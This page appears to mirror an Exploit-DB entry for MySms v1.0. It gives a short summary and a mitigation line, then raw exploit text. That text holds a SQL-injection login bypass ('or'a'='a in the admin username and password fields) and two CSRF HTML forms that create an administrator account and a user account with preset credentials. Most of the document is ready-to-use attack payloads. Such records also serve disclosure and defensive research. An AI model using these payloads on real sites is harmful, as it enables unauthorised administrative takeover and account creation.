header-logo
Suggest Exploit
vendor:
MySms
by:
AtT4CKxT3rR0r1ST
5.5
CVSS
MEDIUM
Multiple
CWE
Product Name: MySms
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

MySms v1.0 Multiple Vulnerabilities

The text describes two vulnerabilities in the MySms v1.0 application. The first vulnerability is an Authentication Bypass, which allows an attacker to bypass authentication by using a specific input. The second vulnerability is Cross-Site Request Forgery (CSRF), which allows an attacker to perform unauthorized actions on behalf of a user.

Mitigation:

The vendor should release a patch to fix the authentication bypass vulnerability and implement proper CSRF protection.
Source

Exploit-DB raw data:

MySms v1.0 Multiple Vulnerabilities 
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]

####################################################################

===[ Exploit ]===

[1]Auth Bypass
===============

www.site.com/MySms/admin/index.php

Username: 'or'a'='a
Password: 'or'a'='a

[2]CSRF
=======
[Add Admin]
------------

<form method="POST" name="form0" action="http://www.site/MySms/admin/adminadd.php">
<input type="hidden" name="username" value="Webadmin"/>
<input type="hidden" name="passwd" value="123456"/>
</form>

</body>
</html>


[Add User]
-----------

<form method="POST" name="form0" action="http://www.site/MySms/admin/usersadd.php">
<input type="hidden" name="username" value="user"/>
<input type="hidden" name="passwd" value="123456"/>
<input type="hidden" name="active" value="y"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="sex" value="m"/>
<input type="hidden" name="level" value="a"/>
<input type="hidden" name="num_msg" value="100"/>
</form>

</body>
</html>
####################################################################